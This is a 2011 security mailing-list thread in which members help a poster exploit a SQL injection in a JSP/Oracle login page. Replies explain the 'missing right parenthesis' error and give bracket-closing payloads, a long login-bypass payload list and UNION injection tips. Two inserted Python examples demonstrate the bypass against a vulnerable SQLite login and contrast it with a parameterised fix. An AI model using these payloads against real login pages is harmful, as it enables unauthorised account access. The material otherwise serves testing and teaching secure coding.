Oracle SQL injection


8a8a

May 17, 2011, 2:24:14 PM
to null-...@googlegroups.com
I am working on a web application running on JSP with Oracle in the backend.
I found a SQL injection in the login page but have not been able to exploit it.
While trying standard SQL injection parameters like:

a' or '1'='1
a' or 1=1--
etc....

I am getting a Java exception with the below error:
ORA-00907: missing right parenthesis
Didn't get much help from Google.

Does anybody have any idea about the possibility of exploiting it?




Yash Kadakia

May 17, 2011, 2:28:04 PM
to null-...@googlegroups.com
Decode the secret message "missing right parenthesis".

Yash

Yash Kadakia

Office: +91-022-23612909
Office: +1-347-99-ITSEC (+1-347-994-8732)
Mobile: +91-9833375290
Blog: http://www.yashkadakia.com/



From: 8a8a <8a8a...@gmail.com>
Date: Tue, 17 May 2011 23:54:14 +0530
Subject: [null] Oracle SQL injection
--
null - Spreading the right Information
null Mailing list charter: http://null.co.in/section/about/null_list_charter/
 
This list is supported by Institute of Information Security http://iisecurity.in
Learn information security at your own pace – eLearning programs at http://elearning.iisecurity.in

Anant Shrivastava

May 17, 2011, 2:33:06 PM
to null-...@googlegroups.com

Could be because of the SQL procedures being used internally.

Just my two cents. I am in no way an expert on this.


Anant Shrivastava 
 CEH | RHCE
Mob : 91-9764899904
E-mail : an...@anantshri.info
Web : http://anantshri.info

8a8a

May 17, 2011, 2:47:28 PM
to null-...@googlegroups.com
> Decode the secret message "missing right parenthesis"

It looks simple from the error message, something like a syntax error in the SQL statement/query, but how can we confirm that using the login page?
I tried all the possible options but every time I get some error.
I am sure there is no typo in the standard SQL injection parameters I am trying.





Yash Kadakia

May 17, 2011, 2:54:48 PM
to null-...@googlegroups.com
"missing right parenthesis" literally means a missing right bracket. That means the query prior to the injection point contained an opening bracket, but your injection string did not provide a closing bracket and instead provided a comment or query terminator.

Simply put, you need something like: a' or 'a' = 'a')--


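To make Yash's point concrete, here is an added example (it is not from the thread and not the code of the application being tested). It splices the two login fields into a statement the way JSP string concatenation would, assuming a query shape of `WHERE (username = '...' AND password = '...')` (an assumption; the real statement is never shown in the thread), and then counts parentheses the way the Oracle parser would, ignoring anything inside single-quoted literals and anything after a `--` comment. The payloads from the thread come out as `unclosed` (the ORA-00907 case: the payload's comment swallowed the template's closing bracket) or `balanced`.

```python
# Added example, not from the thread: a static check that explains ORA-00907.
# TEMPLATE is an assumed shape of the vulnerable JSP query; the thread never
# shows the real statement. Table and column names are made up for the demo.
TEMPLATE = "SELECT id FROM users WHERE (username = '{user}' AND password = '{pw}')"


def build_login_query(user: str, pw: str) -> str:
    """Splice untrusted input into the SQL text, as string concatenation
    in the application would (this is the injection point)."""
    return TEMPLATE.format(user=user, pw=pw)


def paren_balance(sql: str) -> int:
    """Net count of unmatched '(' as the SQL parser sees them.

    Parentheses inside single-quoted string literals do not count (a
    doubled '' is an escaped quote, not the end of the literal), and
    everything after a `--` line comment is ignored. Both are Oracle rules.
    """
    depth = 0
    in_str = False
    i = 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "'":
                if sql[i + 1:i + 2] == "'":
                    i += 1              # '' inside a literal: stay in string
                else:
                    in_str = False
        elif c == "'":
            in_str = True
        elif sql.startswith("--", i):
            break                       # comment runs to end of line
        elif c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
        i += 1
    return depth


def classify(user: str, pw: str = "x") -> str:
    """'unclosed' is the ORA-00907 case: a '(' before the injection point
    is never closed because the payload commented out the template's ')'.
    'extra-close' is the opposite mistake (one ')' too many)."""
    d = paren_balance(build_login_query(user, pw))
    if d > 0:
        return "unclosed"
    if d < 0:
        return "extra-close"
    return "balanced"


if __name__ == "__main__":
    for payload in ["a' or 1=1--", "a' or '1'='1", "') or ('x'='x",
                    "') or UPPER('a')=UPPER('a", "a' or 'a' = 'a')--"]:
        print(f"{payload!r:32} -> {classify(payload)}")
        print("    ", build_login_query(payload, "x"))
```

Run it and compare the printed statements: the `--` payload leaves the bracket open, while the `')` / `)--` forms either close and reopen it or close it and comment out the remainder, which is exactly the reply above. Note that `a' or '1'='1` parses fine against this template, so if the real application errors on it, the real statement is shaped differently from the one assumed here.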

Raxit Sheth

May 17, 2011, 2:53:21 PM
to null-...@googlegroups.com
http://sla.ckers.org/forum/read.php?16,33603,33622 Or just google
"sqli missing right parenthesis" without quotes

8a8a

May 17, 2011, 3:11:11 PM
to null-...@googlegroups.com
@Raxit,

Already gone through that link, but none of the options worked.

@Yash

Will try this statement as well; let's see if it works.

TAS

May 18, 2011, 12:13:04 AM
to null-...@googlegroups.com
Did it work?


41 w4r10r

May 18, 2011, 12:18:49 AM
to null-...@googlegroups.com
I don't know if you have these strings with you already, but try them if you don't, especially the strings with brackets....

admin'-- 
x' or 'x'='x
' or 0=0 -- 
" or 0=0 -- 
or 0=0 -- 
' or 0=0 # 
" or 0=0 # 
or 0=0 # 
' or 'x'='x 
" or "x"="x 
') or ('x'='x 
' or 1=1-- 
" or 1=1-- 
or 1=1-- 
' or a=a-- 
" or "a"="a 
') or ('a'='a 
") or ("a"="a 
hi" or "a"="a 
hi" or 1=1 -- 
hi' or 1=1 -- 
hi' or 'a'='a 
hi') or ('a'='a 
hi") or ("a"="a

TAS

May 18, 2011, 1:14:25 AM
to null-...@googlegroups.com
To put you on the right track of thought: this is an error-based SQL
injection, but in Oracle. Now that you have identified the injection
point, you have to inject the query you want to run and get the output.

Let me know if you got it working.
-
TAS
http://twitter.com/p0wnsauc3

anuj gupta

May 18, 2011, 12:44:51 AM
to null-...@googlegroups.com
Just try the cheat sheet given on hackers.org.

--
Anuj Gupta

Dhiraj Ranka

May 18, 2011, 1:40:34 AM
to null-...@googlegroups.com
You can try this cheat sheet for Oracle

http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/

As you are getting an error, I guess you can try a union injection to enumerate more information about the Oracle database.

For SQL and MySQL:

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

Update us with which injection worked for you.

--
Be in my web world,
http://dhirajranka.com/
http://twitter.com/dhirajranka/

sachins...@gmail.com

May 18, 2011, 2:47:41 AM
to p0wn...@gmail.com, null-...@googlegroups.com
Hi,

First give the valid input and try to close the bracket, and then you can execute the query:

input) ; then query

Try possible combos like

)input


sachins...@gmail.com

May 18, 2011, 2:48:31 AM
to p0wn...@gmail.com, null-...@googlegroups.com
Sorry, on phone ............ :)

8a8a

May 18, 2011, 6:44:06 AM
to null-...@googlegroups.com, p0wn...@gmail.com
Not working....

While trying the below input...
') or UPPER('a')=UPPER('a
or
') or ('x'='x

I am not getting any SQL error, but it says invalid user or password....

cons0ul

May 18, 2011, 8:39:15 AM
to null-...@googlegroups.com
Try UNION, like

valid_input UNION SQL QUERY ') --

It would be good if you are able to find out which procedure or function gives the error.

Rascal♥♥♥

May 18, 2011, 9:08:31 PM
to null-...@googlegroups.com
Hmm, the basic auth bypass you mentioned, a' or '1'='1, usually works quite well for many login pages, but it is dependent upon your JSP code and how you perform the login.
Say I use the following approach to process the login:

query = "select password from login where uname = '" + uname + "'"
pass = (result of query)
if (pass == givenpass)
then
    login
else
    error

The normal SQL injection, as you said, if given
say username = a' or '1'='1 and password = a' or '1'='1,
causes a problem with this approach when comparing the retrieved password with the original password and doesn't log in. But if I give
username = a' or union select 'sample
password = sample
I get logged in.
So your injection must depend upon the code used in the login, so analyse the code so that you can get a SQL injection string for it.

--
-Vengadanathan
"I am ready to change the world , but no one is ready to give the source code .."

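The login logic sketched in the last reply (fetch the stored password for the given username, compare it in application code), together with the close-the-bracket-then-UNION advice from cons0ul's reply, as an added example that is not part of the thread. SQLite stands in for Oracle; the `login` table, its columns, the two users and the parenthesised query shape are all constructed for the demo. One Oracle difference to keep in mind: the injected `SELECT 'sample'` would need `FROM dual` there, while SQLite accepts it bare.

```python
# Added example, not from the thread. SQLite stands in for Oracle; the
# table, columns, users and query shape are constructed for the demo.
import sqlite3

# Constructed sample data standing in for the application's login table.
USERS = [("admin", "s3cret!"), ("bob", "hunter2")]


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE login (uname TEXT, password TEXT)")
    con.executemany("INSERT INTO login VALUES (?, ?)", USERS)
    return con


def login_vulnerable(con: sqlite3.Connection, uname: str, givenpass: str) -> bool:
    """The pattern from the post: concatenate the username into the query,
    fetch the stored password, compare it in application code. The predicate
    is wrapped in parentheses (assumed), which is what turns a `--` payload
    into "missing right parenthesis"."""
    sql = "SELECT password FROM login WHERE (uname = '" + uname + "')"
    row = con.execute(sql).fetchone()
    return row is not None and row[0] == givenpass


def login_fixed(con: sqlite3.Connection, uname: str, givenpass: str) -> bool:
    """Same logic with a bound parameter: the input is data, never SQL text,
    so neither payload below changes the statement."""
    row = con.execute("SELECT password FROM login WHERE (uname = ?)",
                      (uname,)).fetchone()
    return row is not None and row[0] == givenpass


def attempt(login, con: sqlite3.Connection, uname: str, givenpass: str):
    """Run one login attempt. Returns True/False, or 'sql-error' when the
    injected text breaks the statement (the thread's Java exception)."""
    try:
        return login(con, uname, givenpass)
    except sqlite3.Error:
        return "sql-error"


def run_demo() -> dict:
    con = make_db()
    union = "x') UNION SELECT 'sample' --"
    return {
        # closing ')' commented out -> parser error (ORA-00907 on Oracle)
        "comment_payload": attempt(login_vulnerable, con, "a' or 1=1--", "x"),
        # statement is valid and returns every row, but the app compares the
        # FIRST stored password with what was typed -> "invalid user or password"
        "or_payload": attempt(login_vulnerable, con, "a' or '1'='1", "a' or '1'='1"),
        # close the bracket, UNION in a value we control, comment out the rest:
        # the app now compares 'sample' with 'sample' and lets us in
        "union_payload": attempt(login_vulnerable, con, union, "sample"),
        # the same payload against the parameterised query is just a username
        "fixed_union": attempt(login_fixed, con, union, "sample"),
        "fixed_legit": attempt(login_fixed, con, "admin", "s3cret!"),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(f"{name:16} {result}")
```

The three results against `login_vulnerable` reproduce the thread in order: the `--` payload throws, the `or '1'='1` payload runs but is rejected as a bad password, and only the payload that closes the bracket and UNIONs in a known value logs in. That is why the error message alone does not tell you whether you have a working bypass; the comparison happening after the query does.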